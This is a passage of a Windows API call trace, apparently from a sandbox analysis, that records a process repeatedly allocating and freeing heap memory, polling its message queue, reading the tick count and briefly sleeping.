dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.458] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.458] GetTickCount () returned 0x1d24b [0066.458] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.458] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.458] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.458] GetTickCount () returned 0x1d24b [0066.458] GetTickCount () returned 0x1d24b [0066.458] CoFreeUnusedLibraries () [0066.459] GetTickCount () returned 0x1d24b [0066.459] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.459] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.459] GetTickCount () returned 0x1d24b [0066.459] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.459] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.459] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.459] GetTickCount () returned 0x1d24b [0066.459] GetTickCount () returned 0x1d24b [0066.459] CoFreeUnusedLibraries () [0066.459] GetTickCount () returned 0x1d24b [0066.459] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.459] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.459] GetTickCount () returned 0x1d24b [0066.459] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.459] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.459] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.459] GetTickCount () returned 0x1d24b [0066.459] GetTickCount () returned 0x1d24b [0066.459] CoFreeUnusedLibraries () [0066.459] GetTickCount () returned 0x1d24b [0066.459] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.459] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.459] GetTickCount () returned 0x1d24b [0066.459] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.460] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.460] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.460] GetTickCount () returned 0x1d24b [0066.460] GetTickCount () returned 0x1d24b [0066.460] CoFreeUnusedLibraries () [0066.460] GetTickCount () returned 0x1d24b [0066.460] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.460] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.460] GetTickCount () returned 0x1d24b [0066.460] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.460] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.460] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.460] GetTickCount () returned 0x1d24b [0066.460] GetTickCount () returned 0x1d24b [0066.460] CoFreeUnusedLibraries () [0066.460] GetTickCount () returned 0x1d24b [0066.460] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.460] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.460] GetTickCount () returned 0x1d24b [0066.460] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.460] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.460] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.460] GetTickCount () returned 0x1d24b [0066.460] GetTickCount () returned 0x1d24b [0066.460] CoFreeUnusedLibraries () [0066.460] GetTickCount () returned 0x1d24b [0066.460] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.460] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.461] GetTickCount () returned 0x1d24b [0066.461] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.461] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.461] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.461] GetTickCount () returned 0x1d24b [0066.461] GetTickCount () returned 0x1d24b [0066.461] CoFreeUnusedLibraries () [0066.461] GetTickCount () returned 0x1d24b [0066.461] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.461] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.461] GetTickCount () returned 0x1d24b [0066.461] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.461] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.461] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.461] GetTickCount () returned 0x1d24b [0066.461] GetTickCount () returned 0x1d24b [0066.461] CoFreeUnusedLibraries () [0066.461] GetTickCount () returned 0x1d24b [0066.461] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.461] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.461] GetTickCount () returned 0x1d24b [0066.461] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.461] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.462] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.462] GetTickCount () returned 0x1d24b [0066.462] GetTickCount () returned 0x1d24b [0066.462] CoFreeUnusedLibraries () [0066.462] GetTickCount () returned 0x1d24b [0066.462] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.462] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.462] GetTickCount () returned 0x1d24b [0066.462] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.462] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.462] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.462] GetTickCount () returned 0x1d24b [0066.462] GetTickCount () returned 0x1d24b [0066.462] CoFreeUnusedLibraries () [0066.462] GetTickCount () returned 0x1d24b [0066.462] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.462] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.462] GetTickCount () returned 0x1d24b [0066.462] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.462] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.462] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.462] GetTickCount () returned 0x1d24b [0066.462] GetTickCount () returned 0x1d24b [0066.462] CoFreeUnusedLibraries () [0066.462] GetTickCount () returned 0x1d24b [0066.462] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.462] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.463] GetTickCount () returned 0x1d24b [0066.463] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.463] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.463] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.463] GetTickCount () returned 0x1d24b [0066.463] GetTickCount () returned 0x1d24b [0066.463] CoFreeUnusedLibraries () [0066.463] GetTickCount () returned 0x1d24b [0066.463] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.463] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.463] GetTickCount () returned 0x1d24b [0066.463] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.463] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.463] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.463] GetTickCount () returned 0x1d24b [0066.463] GetTickCount () returned 0x1d24b [0066.463] CoFreeUnusedLibraries () [0066.463] GetTickCount () returned 0x1d24b [0066.463] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.463] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.463] GetTickCount () returned 0x1d24b [0066.463] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.463] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.463] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.464] GetTickCount () returned 0x1d24b [0066.464] GetTickCount () returned 0x1d24b [0066.464] CoFreeUnusedLibraries () [0066.464] GetTickCount () returned 0x1d24b [0066.464] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.464] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.464] GetTickCount () returned 0x1d24b [0066.464] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.464] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.464] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.464] GetTickCount () returned 0x1d24b [0066.464] GetTickCount () returned 0x1d24b [0066.464] CoFreeUnusedLibraries () [0066.464] GetTickCount () returned 0x1d24b [0066.464] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.464] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.464] GetTickCount () returned 0x1d24b [0066.464] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.464] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.464] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.464] GetTickCount () returned 0x1d24b [0066.464] GetTickCount () returned 0x1d24b [0066.464] CoFreeUnusedLibraries () [0066.464] GetTickCount () returned 0x1d24b [0066.464] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.464] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.465] GetTickCount () returned 0x1d24b [0066.465] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.465] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.465] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.465] GetTickCount () returned 0x1d24b [0066.465] GetTickCount () returned 0x1d24b [0066.465] CoFreeUnusedLibraries () [0066.465] GetTickCount () returned 0x1d24b [0066.465] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.465] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.465] GetTickCount () returned 0x1d24b [0066.465] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.465] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.465] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.465] GetTickCount () returned 0x1d24b [0066.465] GetTickCount () returned 0x1d24b [0066.465] CoFreeUnusedLibraries () [0066.465] GetTickCount () returned 0x1d24b [0066.465] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.465] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.465] GetTickCount () returned 0x1d24b [0066.466] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.466] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.466] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.466] GetTickCount () returned 0x1d24b [0066.466] GetTickCount () returned 0x1d24b [0066.466] CoFreeUnusedLibraries () [0066.466] GetTickCount () returned 0x1d24b [0066.466] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.466] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.466] GetTickCount () returned 0x1d24b [0066.466] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.466] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.466] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.466] GetTickCount () returned 0x1d24b [0066.466] GetTickCount () returned 0x1d24b [0066.466] CoFreeUnusedLibraries () [0066.466] GetTickCount () returned 0x1d24b [0066.466] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.466] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.466] GetTickCount () returned 0x1d24b [0066.466] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.466] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.466] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.466] GetTickCount () returned 0x1d24b [0066.466] GetTickCount () returned 0x1d24b [0066.466] CoFreeUnusedLibraries () [0066.467] GetTickCount () returned 0x1d24b [0066.467] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.467] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.467] GetTickCount () returned 0x1d24b [0066.467] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.467] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.467] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.467] GetTickCount () returned 0x1d24b [0066.467] GetTickCount () returned 0x1d24b [0066.467] CoFreeUnusedLibraries () [0066.467] GetTickCount () returned 0x1d24b [0066.467] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.467] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.467] GetTickCount () returned 0x1d24b [0066.467] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.467] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.467] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.467] GetTickCount () returned 0x1d24b [0066.467] GetTickCount () returned 0x1d24b [0066.467] CoFreeUnusedLibraries () [0066.467] GetTickCount () returned 0x1d24b [0066.467] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.467] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.467] GetTickCount () returned 0x1d24b [0066.468] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.468] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.468] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.468] GetTickCount () returned 0x1d24b [0066.468] GetTickCount () returned 0x1d24b [0066.468] CoFreeUnusedLibraries () [0066.468] GetTickCount () returned 0x1d24b [0066.468] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.468] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.468] GetTickCount () returned 0x1d24b [0066.468] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.468] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.468] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.468] GetTickCount () returned 0x1d24b [0066.468] GetTickCount () returned 0x1d24b [0066.468] CoFreeUnusedLibraries () [0066.468] GetTickCount () returned 0x1d24b [0066.468] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.468] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.468] GetTickCount () returned 0x1d24b [0066.468] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.468] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.469] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.469] GetTickCount () returned 0x1d25b [0066.469] GetTickCount () returned 0x1d25b [0066.469] GetTickCount () returned 0x1d25b [0066.469] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.469] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.469] GetTickCount () returned 0x1d25b [0066.469] Sleep (dwMilliseconds=0x0) [0066.469] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.469] GetLastError () returned 0x0 [0066.469] GetCurrentProcessId () returned 0xa44 [0066.469] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.469] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.469] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.469] GetTickCount () returned 0x1d25b [0066.469] GetTickCount () returned 0x1d25b [0066.470] GetTickCount () returned 0x1d25b [0066.470] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.470] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.470] GetTickCount () returned 0x1d25b [0066.470] Sleep (dwMilliseconds=0x0) [0066.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.470] GetLastError () returned 0x0 [0066.470] GetCurrentProcessId () returned 0xa44 [0066.470] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.470] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.470] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.470] GetTickCount () returned 0x1d25b [0066.470] GetTickCount () returned 0x1d25b [0066.470] GetTickCount () returned 0x1d25b [0066.470] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.470] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.470] GetTickCount () returned 0x1d25b [0066.470] Sleep (dwMilliseconds=0x0) [0066.470] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.470] GetLastError () returned 0x0 [0066.471] GetCurrentProcessId () returned 0xa44 [0066.471] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.471] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.471] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.471] GetTickCount () returned 0x1d25b [0066.471] GetTickCount () returned 0x1d25b [0066.471] GetTickCount () returned 0x1d25b [0066.471] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.471] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.471] GetTickCount () returned 0x1d25b [0066.471] Sleep (dwMilliseconds=0x0) [0066.471] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.471] GetLastError () returned 0x0 [0066.471] GetCurrentProcessId () returned 0xa44 [0066.471] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.471] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.471] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.471] GetTickCount () returned 0x1d25b [0066.471] GetTickCount () returned 0x1d25b [0066.471] GetTickCount () returned 0x1d25b [0066.471] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.471] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.472] GetTickCount () returned 0x1d25b [0066.472] Sleep (dwMilliseconds=0x0) [0066.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.472] GetLastError () returned 0x0 [0066.472] GetCurrentProcessId () returned 0xa44 [0066.472] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.472] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.472] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.472] GetTickCount () returned 0x1d25b [0066.472] GetTickCount () returned 0x1d25b [0066.472] GetTickCount () returned 0x1d25b [0066.472] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.472] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.472] GetTickCount () returned 0x1d25b [0066.472] Sleep (dwMilliseconds=0x0) [0066.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.472] GetLastError () returned 0x0 [0066.472] GetCurrentProcessId () returned 0xa44 [0066.473] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.473] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.473] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.473] GetTickCount () returned 0x1d25b [0066.473] GetTickCount () returned 0x1d25b [0066.473] GetTickCount () returned 0x1d25b [0066.473] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.473] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.473] GetTickCount () returned 0x1d25b [0066.473] Sleep (dwMilliseconds=0x0) [0066.473] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.473] GetLastError () returned 0x0 [0066.473] 